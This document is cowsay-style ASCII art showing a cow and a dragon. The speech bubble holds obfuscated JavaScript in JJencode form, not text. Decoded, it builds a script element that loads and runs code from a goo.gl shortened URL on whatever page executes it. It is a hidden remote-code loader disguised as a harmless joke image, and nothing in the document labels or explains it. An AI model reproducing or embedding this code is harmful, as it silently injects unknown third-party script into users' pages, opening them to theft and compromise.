 ____________________________________________________________________________________________________________________________________________________________________________________________________
/ _=~[];_={___:++_,$$$$:(![]+"")[_],__$:++_,$_$_:(![]+"")[_],_$_:++_,$_$$:({}+"")[_],$$_$:(_[_]+"")[_],_$$:++_,$$$_:(!""+"")[_],$__:++_,$_$:++_,$$__:({}+"")[_],$$_:++_,$$$:++_,$___:++_,$__$:++_};_ \
| .$_=(_.$_=_+"")[_.$_$]+(_._$=_.$_[_.__$])+(_.$$=(_.$+"")[_.__$])+((!_)+"")[_._$$]+(_.__=_.$_[_.$$_])+(_.$=(!""+"")[_.__$])+(_._=(!""+"")[_._$_])+_.$_[_.$_$]+_.__+_._$+_.$;_.$$=_.$+(!""+"")[_._$$ |
| ]+_.__+_._+_.$+_.$$;_.$=(_.___)[_.$_][_.$_];_.$(_.$(_.$$+"\""+"\\"+_.__$+_.$$_+_.$$_+_.$_$_+"\\"+_.__$+_.$$_+_._$_+"\\"+_.$__+_.___+_.$$_$+"="+_.$$_$+_._$+_.$$__+_._+"\\"+_.__$+_.$_$+_.$_$+_.$$$ |
| _+"\\"+_.__$+_.$_$+_.$$_+_.__+",\\"+_.__$+_.$$_+_._$$+"="+_.$$_$+"."+_.$$__+"\\"+_.__$+_.$$_+_._$_+_.$$$_+_.$_$_+_.__+_.$$$_+"\\"+_.__$+_.___+_.$_$+(![]+"")[_._$_]+_.$$$_+"\\"+_.__$+_.$_$+_.$_$+ |
| _.$$$_+"\\"+_.__$+_.$_$+_.$$_+_.__+"(\\\"\\"+_.__$+_.$$_+_._$$+_.$$__+"\\"+_.__$+_.$$_+_._$_+"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$$_+_.___+_.__+"\\\");\\"+_.__$+_.$$_+_._$$+"."+_.__+"\\"+_.__$+_ |
| .$$$+_.__$+"\\"+_.__$+_.$$_+_.___+_.$$$_+"=\\\""+_.__+_.$$$_+"\\"+_.__$+_.$$$+_.___+_.__+"/\\"+_.__$+_.$_$+_._$_+_.$_$_+"\\"+_.__$+_.$$_+_.$$_+_.$_$_+"\\"+_.__$+_.$$_+_._$$+_.$$__+"\\"+_.__$+_.$ |
| $_+_._$_+"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$$_+_.___+_.__+"\\\",\\"+_.__$+_.$$_+_._$$+".\\"+_.__$+_.$$_+_._$$+"\\"+_.__$+_.$$_+_._$_+_.$$__+"=\\\"//\\"+_.__$+_.$__+_.$$$+_._$+_._$+".\\"+_.__$+ |
| _.$__+_.$$$+(![]+"")[_._$_]+"/"+_.$$_$+"\\"+_.__$+_.$$_+_.$$_+_.$__+"\\"+_.__$+_._$_+_.$$_+_.$_$_+_._$$+"\\\","+_.$$_$+_._$+_.$$__+_._+"\\"+_.__$+_.$_$+_.$_$+_.$$$_+"\\"+_.__$+_.$_$+_.$$_+_.__+" |
| ."+_.$_$$+_._$+_.$$_$+"\\"+_.__$+_.$$$+_.__$+"."+_.$_$_+"\\"+_.__$+_.$$_+_.___+"\\"+_.__$+_.$$_+_.___+_.$$$_+"\\"+_.__$+_.$_$+_.$$_+_.$$_$+"\\"+_.__$+_.___+_._$$+"\\"+_.__$+_.$_$+_.___+"\\"+_.__ |
\ $+_.$_$+_.__$+(![]+"")[_._$_]+_.$$_$+"(\\"+_.__$+_.$$_+_._$$+");"+"\"")())();                                                                                                                      /
 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
                       \                    ^    /^
                        \                  / \  // \
                         \   |\___/|      /   \//  .\
                          \  /O  O  \__  /    //  | \ \           *----*
                            /     /  \/_/    //   |  \  \          \   |
                            @___@`    \/_   //    |   \   \         \/\ \
                           0/0/|       \/_ //     |    \    \         \  \
                       0/0/0/0/|        \///      |     \     \       |  |
                    0/0/0/0/0/_|_ /   (  //       |      \     _\     |  /
                 0/0/0/0/0/0/`/,_ _ _/  ) ; -.    |    _ _\.-~       /   /
                             ,-}        _      *-.|.-~-.           .~    ~
            \     \__/        `/\      /                 ~-. _ .-~      /
             \____(oo)           *.   }            {                   /
             (    (--)          .----~-.\        \-`                 .~
             //__\\  \__ Ack!   ///.----..<        \             _ -~
            //    \\               ///-._ _ _ _ _ _ _{^ - - - - ~